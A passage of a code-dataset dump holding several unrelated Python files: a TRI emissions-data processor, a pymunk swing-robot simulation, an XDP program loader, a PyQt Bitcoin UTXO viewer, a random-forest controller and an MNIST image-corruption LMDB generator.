ESTIMATE']\nstreamA_fields = ['TOTAL DISCHARGES TO STREAM A','DISCHARGES TO STREAM A - BASIS OF ESTIMATE']\nstreamB_fields = ['TOTAL DISCHARGES TO STREAM B','DISCHARGES TO STREAM B - BASIS OF ESTIMATE']\nstreamC_fields = ['TOTAL DISCHARGES TO STREAM C','DISCHARGES TO STREAM C - BASIS OF ESTIMATE']\nstreamD_fields = ['TOTAL DISCHARGES TO STREAM D','DISCHARGES TO STREAM D - BASIS OF ESTIMATE']\nstreamE_fields = ['TOTAL DISCHARGES TO STREAM E','DISCHARGES TO STREAM E - BASIS OF ESTIMATE']\nstreamF_fields = ['TOTAL DISCHARGES TO STREAM 
F','DISCHARGES TO STREAM F - BASIS OF ESTIMATE']\nonsiteland_fields = ['TOTAL LAND TREATMENT','LAND TRTMT/APPL FARMING - BASIS OF ESTIMATE']\nonsiteother_fields = ['TOTAL OTHER DISPOSAL','OTHER DISPOSAL -BASIS OF ESTIMATE']\noffsiteland_fields = ['LAND TREATMENT']\noffsiteother_fields = ['OTHER LAND DISPOSAL']\n\nimport_facility = ['TRIFID'] + facility_fields\nimport_fug = concat_req_field(fug_fields)\nimport_stack = concat_req_field(stack_fields)\nimport_streamA = concat_req_field(streamA_fields)\nimport_streamB = concat_req_field(streamB_fields)\nimport_streamC = concat_req_field(streamC_fields)\nimport_streamD = concat_req_field(streamD_fields)\nimport_streamE = concat_req_field(streamE_fields)\nimport_streamF = concat_req_field(streamF_fields)\nimport_onsiteland = concat_req_field(onsiteland_fields)\nimport_onsiteother = concat_req_field(onsiteother_fields)\n# Offsite treatment does not include basis of estimate codes\nimport_offsiteland = concat_req_field(offsiteland_fields)\nimport_offsiteother = concat_req_field(offsiteother_fields)\n\nkeys = ['fug', 'stack', 'streamA', 'streamB', 'streamC', 'streamD', 'streamE', 'streamF', 'onsiteland', 'onsiteother',\n 'offsiteland', 'offsiteother']\n\nvalues = [import_fug, import_stack, import_streamA, import_streamB,\n import_streamC, import_streamD, import_streamE, import_streamF,\n import_onsiteland, import_onsiteother, import_offsiteland, import_offsiteother]\n\n\ndef dict_create(k, v):\n dictionary = dict(zip(k, v))\n return dictionary\n\n\n# Create a dictionary that had the import fields for each release type to use in import process\nimport_dict = dict_create(keys, values)\n\n# Import TRI file\nexternal_dir = set_dir(data_dir + '../../../')\ntri_csv = external_dir + 'TRI/US_' + TRIyear + '_v' + tri_version + '/US_1_' + TRIyear + '_v' + tri_version + '.txt'\n\ntri_release_output_fieldnames = ['FacilityID', 'CAS', 'FlowName', 'Unit', 'FlowAmount','Basis of Estimate','ReleaseType']\n\n\n# Cycle through file importing by release type, the dictionary key\ndef import_TRI_by_release_type(d):\n tri = pd.DataFrame()\n for k, v in d.items():\n #create a data type dictionary\n dtype_dict = {'TRIFID':\"str\", 'CHEMICAL NAME':\"str\", 'CAS NUMBER':\"str\",'UNIT OF MEASURE':\"str\"}\n #The amount column will have the index of 4 - set to float\n dtype_dict[v[4]] = \"float\"\n #If a basis of estimate field is present, set its type to string\n if len(v) > 5:\n dtype_dict[v[5]] = \"str\"\n #log.info('Importing '+k+' releases')\n tri_part = pd.read_csv(tri_csv, sep='\\t', header=0, usecols=v, dtype=dtype_dict,na_values=['NO'])\n #If errors are produced on import, can add param above error_bad_lines=False\n if k.startswith('offsite'):\n tri_part['Basis of Estimate'] = 'NA'\n tri_part['ReleaseType'] = k\n tri_part.columns = tri_release_output_fieldnames\n tri = pd.concat([tri,tri_part])\n return tri\n\n\ntri = import_TRI_by_release_type(import_dict)\nlen(tri)\n# 953004 for 2016\n# 980196 for 2015\n# 994032 for 2014\n# 995712 for 2013\n# 992364 for 2012\n# 988848 for 2011\n\n# drop NA for Amount, but leave in zeros\ntri = tri.dropna(subset=['FlowAmount'])\nlen(tri)\n#531157 for 2016\n#546111 for 2015\n#553481 for 2014\n#554590 for 2013\n#553041 for 2012\n#551027 for 2011\n\n\n# There is white space after some basis of estimate codes...remove it here\ndef strip_coln_white_space(df, coln):\n df[coln] = df[coln].str.strip()\n return df\n\n\ntri = strip_coln_white_space(tri, 'Basis of Estimate')\n\n#Convert to float if there are errors - be careful with this 
line\nif tri['FlowAmount'].values.dtype != 'float64':\n tri['FlowAmount'] = pd.to_numeric(tri['FlowAmount'], errors='coerce')\n\n#Drop 0 for FlowAmount\ntri = tri[tri['FlowAmount'] != 0]\nlen(tri)\n#100853 for 2016\n#103619 for 2015\n#104432 for 2014\n#104643 for 2013\n#105011 for 2012\n#104399 for 2011\n\n# Import reliability scores for TRI\ntri_reliability_table = reliability_table[reliability_table['Source']=='TRI']\ntri_reliability_table.drop('Source', axis=1, inplace=True)\n\n#Merge with reliability table to get\ntri = pd.merge(tri,tri_reliability_table,left_on='Basis of Estimate',right_on='Code',how='left')\n# Fill NAs with 5 for DQI reliability score\ntri['DQI Reliability Score'] = tri['DQI Reliability Score'].fillna(value=5)\n# Drop unneeded columns\n#tri.drop('Note',axis=1,inplace=True)\ntri.drop('Basis of Estimate',axis=1,inplace=True)\ntri.drop('Code',axis=1,inplace=True)\n\n# Replace source info with Context\nsource_cnxt = data_dir + 'TRI_ReleaseType_to_Compartment.csv'\nsource_to_context = pd.read_csv(source_cnxt)\ntri = pd.merge(tri, source_to_context, how='left')\n\n# Convert units to ref mass unit of kg\n# Create a new field to put converted amount in\ntri['Amount_kg'] = 0.0\ntri = unit_convert(tri, 'Amount_kg', 'Unit', 'Pounds', lb_kg, 'FlowAmount')\ntri = unit_convert(tri, 'Amount_kg', 'Unit', 'Grams', g_kg, 'FlowAmount')\n# drop old amount and units\ntri.drop('FlowAmount',axis=1,inplace=True)\ntri.drop('Unit',axis=1,inplace=True)\n\n# Rename cols to match reference format\ntri.rename(columns={'Amount_kg':'FlowAmount'},inplace=True)\ntri.rename(columns={'DQI Reliability Score':'ReliabilityScore'},inplace=True)\n\n#Store totals by releasetype\n#tri_totals_by_releasetype = tri.groupby('ReleaseType')['FlowAmount'].sum()\n#tri_totals_by_releasetype.to_csv('tri_totals_by_releasetype_'+TRIyear+'.csv')\n\n\n#Drop release type\ntri.drop('ReleaseType',axis=1,inplace=True)\n\n#Group by facility, flow and compartment to aggregate different release types\ngrouping_vars = ['FacilityID', 'FlowName','CAS','Compartment']\nwm = lambda x: np.average(x, weights=tri.loc[x.index, \"FlowAmount\"])\n# Define a dictionary with the functions to apply for a given column:\nf = {'FlowAmount': ['sum'], 'ReliabilityScore': {'weighted_mean': wm}}\n# Groupby and aggregate with your dictionary:\ntri = tri.groupby(grouping_vars).agg(f)\ntri = tri.reset_index()\ntri.columns = tri.columns.droplevel(level=1)\n\n#VALIDATE\ntri_national_totals = pd.read_csv(data_dir + 'TRI_'+ TRIyear + '_NationalTotals.csv',header=0,dtype={\"FlowAmount\":np.float})\ntri_national_totals['FlowAmount_kg']=0\ntri_national_totals = unit_convert(tri_national_totals, 'FlowAmount_kg', 'Unit', 'Pounds', 0.4535924, 'FlowAmount')\n# drop old amount and units\ntri_national_totals.drop('FlowAmount',axis=1,inplace=True)\ntri_national_totals.drop('Unit',axis=1,inplace=True)\n# Rename cols to match reference format\ntri_national_totals.rename(columns={'FlowAmount_kg':'FlowAmount'},inplace=True)\nvalidation_result = validate_inventory(tri, tri_national_totals, group_by='flow', tolerance=5.0)\nwrite_validation_result('TRI',TRIyear,validation_result)\n\n#FLOWS\nflows = tri.groupby(['FlowName','CAS','Compartment']).count().reset_index()\n#stack by compartment\nflowsdf = flows[['FlowName','CAS','Compartment']]\nflowsdf['FlowID'] = flowsdf['CAS']\n#export chemicals\n#!!!Still needs CAS number and FlowID\nflowsdf.to_csv(output_dir+'flow/'+'TRI_'+ TRIyear + '.csv', index=False)\n\n#FLOW BY FACILITY\n#drop 
CAS\ntri.drop(columns=['CAS'],inplace=True)\ntri_file_name = 'TRI_' + TRIyear + '.csv'\ntri.to_csv(output_dir + 'flowbyfacility/' + tri_file_name, index=False)\n\n#FACILITY\n##Import and handle TRI facility data\ntri_facility = pd.read_csv(tri_csv, sep='\\t', header=0, usecols=import_facility, error_bad_lines=False)\n#get unique facilities\ntri_facility_unique_ids = pd.unique(tri_facility['TRIFID'])\nlen(tri_facility_unique_ids)\n#2016: 21670\n#2015: 22131\n\ntri_facility_unique_rows = tri_facility.drop_duplicates()\nlen(tri_facility_unique_rows)\n#2016: 21738\n#2015: 22195\n#2014: 22291\n\n#Use group by to elimiate additional ID duplicates\n#tri_facility_unique_rows_agg = tri_facility_unique_rows.groupby(['TRIFID'])\n#tri_facility_final = tri_facility_unique_rows_agg.aggregate()\n\ntri_facility_final = tri_facility_unique_rows\n\n#rename columns\n\nTRI_facility_name_crosswalk = {\n 'TRIFID':'FacilityID',\n 'FACILITY NAME':'FacilityName',\n 'FACILITY STREET':'Address',\n 'FACILITY CITY':'City',\n 'FACILITY COUNTY':'County',\n 'FACILITY STATE': 'State',\n 'FACILITY ZIP CODE':'Zip',\n 'PRIMARY NAICS CODE':'NAICS',\n 'LATITUDE': 'Latitude',\n 'LONGITUDE':'Longitude'\n }\n\ntri_facility_final.rename(columns=TRI_facility_name_crosswalk,inplace=True)\n\ntri_facility_final.to_csv(output_dir+'facility/'+'TRI_'+ TRIyear + '.csv', index=False)\n\n\n# Record TRI metadata\ntry: retrieval_time = os.path.getctime(external_dir + 'TRI/US_' + TRIyear + '_v' + tri_version + '/US_1_' + TRIyear + '_v' + tri_version + '.zip')\nexcept:\n try: retrieval_time = os.path.getctime(tri_csv)\n except: retrieval_time = time.time()\ntri_metadata['SourceAquisitionTime'] = time.ctime(retrieval_time)\ntri_metadata['SourceFileName'] = get_relpath(tri_csv)\ntri_metadata['SourceURL'] = tri_url\ntri_metadata['SourceVersion'] = tri_version\n\nwrite_metadata('TRI', TRIyear, tri_metadata)\n","sub_path":"stewi/TRI.py","file_name":"TRI.py","file_ext":"py","file_size_in_byte":11786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255347845","text":"import sys, random\r\nimport pygame\r\nimport pymunk\r\nimport pymunk.pygame_util\r\nfrom pygame.locals import *\r\nimport numpy as np\r\nfrom pygame.color import *\r\n\r\ndef add_swing(space):\r\n rotation_center_body = pymunk.Body(body_type = pymunk.Body.STATIC)\r\n rotation_center_body.position = (300,300)\r\n\r\n rod = pymunk.Body()\r\n rod.position = (300,138)\r\n rod_u = pymunk.Segment(rod, (0,162), (0,0), 2.0)\r\n rod_u.mass = 2.2\r\n rod_u.filter = pymunk.ShapeFilter(categories=1)\r\n rod_u.color = THECOLORS[\"black\"]\r\n\r\n seat_pivot = pymunk.Body()\r\n seat_pivot.position = (300,118)\r\n rod_l = pymunk.Segment(seat_pivot, (0,20), (0,0), 2.0)\r\n rod_l.mass = 0.3\r\n rod_l.color = THECOLORS[\"green\"]\r\n\r\n\r\n seat = pymunk.Poly(seat_pivot, [(-5, 2), (5, 2), (5,-2),(-5,-2)])\r\n seat.mass = 1.065\r\n seat.color = THECOLORS[\"pink\"]\r\n\r\n ceiling_joint = pymunk.PivotJoint(rod, rotation_center_body, (0,162), (0,0))\r\n pivot_joint = pymunk.PivotJoint(rod,seat_pivot,(0,0),(0,20))\r\n pivot_joint._set_collide_bodies(False)\r\n pivot_fric = pymunk.GearJoint(rod,seat_pivot,0,1)\r\n pivot_fric.max_force = 1000\r\n space.add(rod_u,rod_l, seat, rod, seat_pivot, ceiling_joint, pivot_joint,pivot_fric)\r\n\r\n return rod,seat_pivot\r\n\r\ndef add_robot(space,rod,seat):\r\n #define robot upper body and upper leg\r\n robot_body = pymunk.Body()\r\n robot_u = pymunk.Poly(robot_body,[(-4,31.64),(-4,0),(4,0),(4,31.64)])\r\n 
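    # Masses are set on the shapes rather than on the Body: pymunk derives a
    # body's total mass and moment of inertia from its attached shapes when
    # the body is added to the space.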
robot_u.mass = 3.311\r\n robot_u.color = THECOLORS[\"red\"]\r\n robot_u.filter = pymunk.ShapeFilter(mask=pymunk.ShapeFilter.ALL_MASKS ^ 1)\r\n\r\n robot_body.position = seat.position\r\n robot_u_leg = pymunk.Poly(seat,[(0,2),(-15,2),(-15,8),(0,8)])\r\n robot_u_leg.color = THECOLORS[\"red\"]\r\n robot_u_leg.mass = 0.603\r\n\r\n #define robot lower leg\r\n robot_leg = pymunk.Body()\r\n robot_leg.position = seat.position\r\n robot_l_leg = pymunk.Poly(robot_leg,[(-15,2),(-15,-14.8),(-9,-14.8),(-9,2)])\r\n robot_l_leg.mass = 1.214\r\n robot_l_leg.color = THECOLORS[\"red\"]\r\n space.add(robot_body,robot_u,robot_u_leg,robot_leg,robot_l_leg)\r\n\r\n #motor and pivot for hip\r\n seat_motor = pymunk.SimpleMotor(seat,robot_body,0)\r\n seat_motor.max_force = 1e6\r\n seat_pivot = pymunk.PivotJoint(seat,robot_body,seat.position)\r\n seat_pivot._set_collide_bodies(False)\r\n seat_pivot_lim = pymunk.RotaryLimitJoint(robot_body,seat,0,1.11529)\r\n space.add(seat_motor,seat_pivot,seat_pivot_lim)\r\n\r\n #motor and pivot for knee\r\n knee_motor = pymunk.SimpleMotor(seat,robot_leg,0)\r\n knee_motor.max_force = 1e5\r\n knee_pivot = pymunk.PivotJoint(seat,robot_leg,seat.position+(-13,2))\r\n knee_pivot._set_collide_bodies(False)\r\n knee_pivot_lim = pymunk.RotaryLimitJoint(seat,robot_leg,-1.04604,0.44604)\r\n space.add(knee_motor,knee_pivot,knee_pivot_lim)\r\n\r\n return seat_motor,knee_motor,robot_body\r\n\r\ndef initialise():\r\n space = pymunk.Space()\r\n space.gravity = (0, -981)\r\n space.damping = 0.95\r\n\r\n swing,seat = add_swing(space)\r\n seat_motor,knee_motor,robot_u = add_robot(space,swing,seat)\r\n\r\n swing.apply_force_at_local_point((40000,0),(0,0))\r\n\r\n pygame.init()\r\n screen = pygame.display.set_mode((600, 600))\r\n pygame.display.set_caption(\"I'm so swungover\")\r\n clock = pygame.time.Clock()\r\n font = pygame.font.SysFont(\"Arial\", 16)\r\n draw_options = pymunk.pygame_util.DrawOptions(screen)\r\n return [space,swing,seat,robot_u,seat_motor,knee_motor,screen,draw_options,clock,font]\r\n\r\ndef stepper(space,swing,seat,robot_u,seat_motor,knee_motor,screen,draw_options,clock,font,action):\r\n if action == 2:\r\n seat_motor.rate = 2.788225\r\n knee_motor.rate = 3.7302\r\n elif action == 1:\r\n seat_motor.rate = 0\r\n knee_motor.rate = 0\r\n elif action == 0:\r\n seat_motor.rate = -2.788225\r\n knee_motor.rate = -3.7302\r\n\r\n screen.fill((255,255,255))\r\n space.debug_draw(draw_options)\r\n screen.blit(font.render(\"Angle = \" + str(swing._get_angle()),1, THECOLORS[\"black\"]), (0,0))\r\n screen.blit(font.render(\"Swing Velocity = \" + str(swing._get_angular_velocity()),1, THECOLORS[\"black\"]), (0,20))\r\n pygame.display.flip()\r\n clock.tick(50)\r\n\r\n space.step(1.0/50.0)\r\n\r\n #return values\r\n rod_angle = swing._get_angle()\r\n rod_ang_vel = swing._get_angular_velocity()\r\n seat_angle = seat._get_angle()\r\n seat_ang_vel = seat._get_angular_velocity()\r\n body_pos = robot_u._get_angle()-seat_angle\r\n\r\n return [rod_angle,rod_ang_vel,seat_angle,seat_ang_vel,body_pos],[space,swing,seat,robot_u,seat_motor,knee_motor,screen,draw_options,clock,font]\r\n\r\n","sub_path":"MachineLearning/Will's work/Early Learning Processes/Gnarl Evolution Learning/Seated_Pivot_Swinging_ML_Display.py","file_name":"Seated_Pivot_Swinging_ML_Display.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"618880456","text":"import os\nfrom os.path import expanduser\nimport sys\nimport argparse \n\ninterfaces 
= [\"ens3f1\"]\nprograms = {\n \"xdp2\": (\"xdp2_kern\", \"completed-programs/kernel_samples_xdp2_kern_xdp1_runtime_debug\"),\n \"xdp_fw\": (\"xdp_fw_kern\", \"completed-programs/simple_fw_xdp_fw_runtime_debug\"),\n \"xdp_router_ipv4\": (\"xdp_router_ipv4_kern\", \"completed-programs/kernel_samples_xdp_router_ipv4_runtime_debug\"),\n \"xdp_fwd\": (\"xdp_fwd_kern\", \"completed-programs/kernel_samples_xdp_fwd_kern_xdp_fwd_runtime_debug\")\n}\nparser = argparse.ArgumentParser(description='Information about Data')\nparser.add_argument('-b', dest=\"benchmark\", type=str, help=f\"Benchmark {str(programs.keys())}\", required=True)\nparser.add_argument('-v', dest=\"version\", type=str, help='Name of version (e.g O1, O2, K0, K1, K2, K3, K4)', required=True)\nargs = parser.parse_args()\n\nhome = expanduser(\"~\")\nhome = \"/usr/local\"\n# read interfaces\nf = open(f\"{home}/trex-configuration/scripts/device.config\", \"r\")\ndevice = f.read()\ndevice = device.strip('\\n')\nf.close()\ni = open(f\"{home}/trex-configuration/scripts/{device}.config\", \"r\")\ninterfaces = i.read().split(\"\\n\")\n\nos.chdir(f\"{home}/throughput-experiments\")\nfor x in interfaces:\n os.system(f\"sudo ip link set dev {x} xdp off\")\n\nnumber = list(args.version)[1]\nif \"k\" in args.version.lower():\n os.system(f\"sudo cp {programs[args.benchmark][1]}/top-progs/{programs[args.benchmark][0]}{number}.o {programs[args.benchmark][0]}.o\")\nelse:\n os.system(f\"sudo cp {args.version.upper()}/{programs[args.benchmark][0]}.o .\")\n\n# load program \n\nif args.benchmark == \"xdp1\":\n os.system(f\"sudo ./xdp1 -N {interfaces[0]}\")\nelif args.benchmark == \"xdp2\":\n os.system(f\"sudo ./xdp2 -N {interfaces[0]}\")\nelif args.benchmark == \"xdp_pktcntr\":\n os.system(f\"sudo ip link set dev {interfaces[0]} xdp obj xdp_pktcntr.o sec xdp-pktcntr\")\nelif args.benchmark == \"xdp_redirect\":\n if len(interfaces) == 1:\n os.system(f\"sudo ./xdp_redirect -N {interfaces[0]} -N {interfaces[0]}\")\n else: \n os.system(f\"sudo ./xdp_redirect -N {interfaces[0]} -N {interfaces[1]} \")\nelif args.benchmark == \"xdp_map_access\":\n os.system(f\"sudo ./xdp_map_access -N {interfaces[0]}\")\nelif args.benchmark == \"xdp_fw\":\n os.system(f\"sudo ./xdp_fw\")\nelif args.benchmark == \"xdp_router_ipv4\":\n os.system(f\"sudo ./xdp_router_ipv4 -S {interfaces[0]}\")\nelif args.benchmark == \"xdp_fwd\":\n os.system(f\"sudo ./xdp_fwd {' '.join(interfaces)}\")","sub_path":"scripts/load_xdp.py","file_name":"load_xdp.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"70186694","text":"from PyQt5 import uic\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom bit.network import NetworkAPI\nimport threading\n\nclass MyWinClass(QMainWindow):\n\n # 一个自定义的信号\n sig_unspents_arrived = pyqtSignal(object)\n\n def __init__(self):\n super().__init__()\n win = uic.loadUi(\"bitcoin_beta.ui\", self)\n win.show()\n\n def get_account(self):\n # 查询中界面设置\n self.treeWidget.setHidden(True)\n self.pushButton.setEnabled(False)\n self.label_2.setText( '查询中......' 
)\n\n        # start a new thread to run the query\n        addr = self.lineEdit.text()\n        t=threading.Thread(target=self.get_utxo,args=(addr,))\n        t.start()\n\n    def get_utxo(self, addr):\n        \"\"\"Run the query; emit sig_unspents_arrived when the result comes back\"\"\"\n        unspents = NetworkAPI.get_unspent(addr)\n        self.sig_unspents_arrived.emit(unspents)\n\n    def handle_unspents_arrived(self, unspents):\n        \"\"\"Adjust the UI according to the query result\"\"\"\n        self.pushButton.setEnabled(True)\n\n        if len(unspents)==0:\n            self.label_2.setText( '0' )\n        else:\n            self.treeWidget.clear()\n            self.treeWidget.setHidden(False)\n            s=sum(unspent.amount for unspent in unspents)\n            self.label_2.setText( '%d
'%(s) )\n for utxo in unspents:\n root=QTreeWidgetItem(self.treeWidget)\n root.setText(0,'amount')\n root.setText(1,str(utxo.amount))\n txid = QTreeWidgetItem(root)\n txid.setText(0,'txid')\n txid.setText(1,utxo.txid)\n txindex = QTreeWidgetItem(root)\n txindex.setText(0,'txindex')\n txindex.setText(1,str(utxo.txindex))\n script = QTreeWidgetItem(root)\n script.setText(0,'script')\n script.setText(1,utxo.script)\n confirmations = QTreeWidgetItem(root)\n confirmations.setText(0,'confirmations')\n confirmations.setText(1,str(utxo.confirmations))\n segwit = QTreeWidgetItem(root)\n segwit.setText(0,'segwit')\n segwit.setText(1,str(utxo.segwit))\n\napp = QApplication([])\nmyWin = MyWinClass()\n\napp.exec_()\n","sub_path":"06.图形用户界面/programs/bitcoin_beta2.py","file_name":"bitcoin_beta2.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"146974434","text":"from sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier\nfrom pandas import read_csv\nfrom os import path as os_path\nfrom json import loads\nfrom csv import DictWriter as csv_writer\nfrom pickle import dumps as pdumps\n\n\ndef make_model(path, test_data, training_data, test, config, log):\n ''' generate a random forest classifier '''\n try:\n rfc = RandomForestClassifier(n_estimators=config.get('estimators', 100))\n rfc.fit(\n training_data.as_matrix(config['features'][test]),\n training_data.as_matrix(config['classes'])\n )\n return rfc\n except ValueError:\n log.error('Faulty data in training set')\n return None\n\n\ndef analyze_data(test, config, log):\n '''\n build a random forest and score data, based on the example found here:\n - http://www.analyticbridge.com/profiles/blogs/random-forest-in-python\n '''\n path = config.get('path', './data')\n try:\n training_data = read_csv('/'.join((path, test, 'train.csv')))\n test_data = read_csv('/'.join((path, test, 'test.csv')))\n rfc = make_model(path, test_data, training_data, test, config, log)\n if rfc:\n results = rfc.predict(test_data.as_matrix(config['features'][test]))\n log.info(results)\n\n test_data['predictions'] = results\n log.info(test_data.head())\n else:\n log.error('Failed to generate model')\n return None\n except Exception as e:\n log.error('Data analysis failed to run')\n log.debug(e)\n return None\n else:\n return results\n\ndef build_csv(name, test_type, data, config, log, test=False):\n ''' dump JSON data to CSV file '''\n\n data = loads(data)\n cols = ['name'] + [key for key in data]\n data['name'] = name\n log.debug(data)\n\n # changing mode from ab+ to a+ and wb+ to w+\n # for python3 compatibility\n filename = 'train.csv'\n mode = 'a+'\n\n if test:\n filename = 'test.csv'\n mode = 'w+'\n\n path = config.get('path', './data')\n csv_file = '/'.join((path, test_type, filename))\n\n file_exists = False\n try:\n if os_path.isfile(csv_file):\n if os_path.getsize(csv_file) > 0:\n log.info('Training file exists')\n file_exists = True\n except OSError:\n log.error('Failed to validate if file exists')\n return False\n else:\n try:\n with open(csv_file, mode) as csvf:\n writer = csv_writer(csvf, fieldnames=cols)\n if not file_exists or test:\n writer.writeheader()\n writer.writerow(data)\n except IOError:\n log.error('Failed to open csv file')\n except TypeError:\n log.error('Bad mode in csv files')\n except Exception as e:\n log.error('Something unexpected happened')\n log.error(e)\n else:\n log.info('Data inserted to 
CSV')\n return True\n return False\n\ndef export_model(test, config, log):\n ''' export the model so it can be downloaded '''\n path = config.get('path', './data')\n try:\n training_data = read_csv('/'.join((path, test, 'train.csv')))\n test_data = read_csv('/'.join((path, test, 'test.csv')))\n rfc = make_model(path, test_data, training_data, test, config, log)\n if rfc:\n try:\n model_dump = pdumps(rfc)\n return model_dump\n except:\n log.error('Failed to export the model')\n else:\n log.error('Failed to generate the model')\n return '{}'\n except ValueError:\n log.error('failed to pull data to train the model') \n return '{}'\n","sub_path":"app/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"207889242","text":"import caffe\nimport lmdb\nimport numpy as np\nimport cv2\nimport io\nimport os\nimport numpy as np\n\nclass MNISTcorrupter(object):\n \n def __init__(self, src_lmdb_dir, dst_lmdb_dir, N_im, batch_size, set_str, dir_str, angles, N_pix_corrupt):\n self.src_lmdb_dir = src_lmdb_dir\n self.dst_lmdb_dir = dst_lmdb_dir\n self.set_str = set_str\n self.dir_str = dir_str\n self.NUM_IDX_DIGITS = 10\n self.IDX_FMT = '{:0>%d' % self.NUM_IDX_DIGITS + 'd}' \n self.MAP_SZ = int(1e12)\n self.N_im = N_im #Size of images used from MNIST\n self.batch_size = batch_size\n self.angles = angles\n self.N_pix_corrupt = N_pix_corrupt\n self.n_angles = len(angles)\n\n @staticmethod \n def rotate_image(im, angle):\n rows,cols = im.shape\n M = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1)\n return cv2.warpAffine(im,M,(cols,rows))\n\n \n @staticmethod\n def corrupt_image(im, N_pix_corrupt):\n rows,cols = im.shape\n randint = np.random.choice(int(rows*cols), N_pix_corrupt, replace=False)\n im2 = np.copy(im.flatten())\n im2[randint] = 0.\n return randint, im2.reshape((rows,cols))\n\n def shuffle_samples_lmdb(self,path_lmdb, path_dst, keys):\n \"\"\"\n Copy select samples from an lmdb into another.\n Can be used for sampling from an lmdb into another and generating a random shuffle\n of lmdb content.\n\n Parameters:\n path_lmdb -- source lmdb\n path_dst -- destination lmdb\n keys -- list of keys or indices to sample from source lmdb\n \"\"\"\n\n db = lmdb.open(path_dst, map_size=self.MAP_SZ)\n key_dst = 0\n with db.begin(write=True) as txn_dst:\n with lmdb.open(path_lmdb, readonly=True).begin() as txn_src: \n for key_src in keys:\n ########################\n if not isinstance(key_src, basestring):\n key_src = self.IDX_FMT.format(key_src)\n txn_dst.put(self.IDX_FMT.format(key_dst), txn_src.get(key_src))\n key_dst += 1\n\n\n ########################\n\n #if not isinstance(key_src, basestring):\n # key_src = IDX_FMT.format(key_src)\n # \n #datum_from = caffe.proto.caffe_pb2.Datum()#\n\n # datum_from.ParseFromString(txn_src.get(key_src))\n\n # datum_to = caffe.proto.caffe_pb2.Datum()\n # datum_to.label = datum_from.label\n # datum_to.data = datum_from.data\n\n #txn_dst.put(IDX_FMT.format(key_dst), datum_to.SerializeToString())\n #key_dst += 1\n # if key_dst ==5:\n # break\n db.close()\n\n \n def create_shuffled_ind(self, lmdb_dir, txt_save_dir):\n db = lmdb.open(lmdb_dir)\n N_im = db.stat()['entries']\n ind = range(N_im)\n print('Indices created', N_im)\n np.random.shuffle(ind)\n keys_shuffled = [self.IDX_FMT.format(i) for i in ind]\n\n import json\n if not os.path.exists(txt_save_dir):\n os.makedirs(txt_save_dir)\n\n f = open(txt_save_dir + '/indices_list.txt', 'w')\n 
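        # Persist the shuffled key order as JSON so the exact same shuffle can
        # be reloaded later (run() reads this file back when a saved index
        # path is passed in) instead of reshuffling on every run.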
json.dump(keys_shuffled, f)\n f.close()\n return ind\n\n def load_N_MNIST_images(self, N, path):\n #path = '/mnt/antares_raid/home/oliver/adhara/src/caffe/examples/mnist/mnist_train_lmdb'\n lmdb_env = lmdb.open(path)\n lmdb_txn = lmdb_env.begin()\n lmdb_cursor = lmdb_txn.cursor()\n datum_db = caffe.proto.caffe_pb2.Datum()\n I = []\n Label = []\n im_count = 0\n for key, value in lmdb_cursor:\n datum_db.ParseFromString(value)\n label = datum_db.label\n data = caffe.io.datum_to_array(datum_db)\n im = data.astype(np.uint8)\n im = np.transpose(im, (2, 1, 0)) # original (dim, col, row)\n I.append(im.squeeze())\n Label.append(datum_db.label)\n im_count = im_count + 1\n\n if im_count >= N:\n break\n return I, Label\n \n \n def run(self,*args):\n set_st = self.set_str + str(self.N_im) + '_corrupt_px_%i_'%self.N_pix_corrupt \n\n #Create angles\n\n #Load MNIST Database\n IMG, LABEL = self.load_N_MNIST_images(self.N_im, self.src_lmdb_dir + 'mnist' + self.dir_str + 'lmdb')\n # N_im = db.stat()['entries']\n\n\n #N_im = lmdb_env.stat()['entries']\n N = np.dot(np.shape(self.angles),self.N_im)\n N = N[0]\n\n\n map_size = N*28*28*100\n\n rot_angs = np.zeros(N)\n im_count = 0\n #Looping over batches\n for idx in range(int(np.ceil(N/self.batch_size))):\n count = 0\n env_randint = lmdb.open(self.dst_lmdb_dir + 'MNIST' + set_st + 'randint_lmdb/', map_size=map_size)\n env_rot = lmdb.open(self.dst_lmdb_dir + 'MNIST' + set_st + 'rot_lmdb/', map_size=map_size)\n env_rot_ang = lmdb.open(self.dst_lmdb_dir + 'MNIST' + set_st + 'rot_ang_lmdb/',map_size=int(1e12))\n env_unrot = lmdb.open(self.dst_lmdb_dir + 'MNIST' + set_st + 'unrot_lmdb/',map_size=map_size)\n env_unrot_corrupted = lmdb.open(self.dst_lmdb_dir + 'MNIST' + set_st + 'corrupted_unrot_lmdb/',map_size=map_size)\n\n with env_rot.begin(write=True) as txn: \n with env_randint.begin(write=True) as txn_randint: \n with env_unrot.begin(write=True) as txn_unrot:\n with env_unrot_corrupted.begin(write=True) as txn_unrot_corrupted:\n with env_rot_ang.begin(write=True) as txn_rot_ang:\n # Looping over images from MNIST\n for in_, lab_ in zip(IMG[(int(self.batch_size*idx)):(int(self.batch_size*(idx+1)))], LABEL[int((self.batch_size*idx)):(int(self.batch_size*(idx+1)))]):\n im = in_\n label = lab_\n for angle in self.angles:\n #Prepare data\n X_rot = self.rotate_image(im.squeeze(), angle)\n _,X_uncrot_uncorr = self.corrupt_image(im.squeeze(), self.N_pix_corrupt)\n randint, X = self.corrupt_image(X_rot, self.N_pix_corrupt)\n X = np.reshape(X,[1,28,28])\n\n datum = caffe.io.array_to_datum(X.astype(float), label)\n # if in_idx ==1:\n # print(X.astype(float).shape)\n #datum.channels = X.shape[0]\n #datum.height = X.shape[1]\n #datum.width = X.shape[2]\n #datum.data = X.tostring() # or .tostring() if numpy < 1.9\n\n #datum.label = label\n rot_angs[count] = str(angle) # \"{0}\".format(angle)\n str_id = 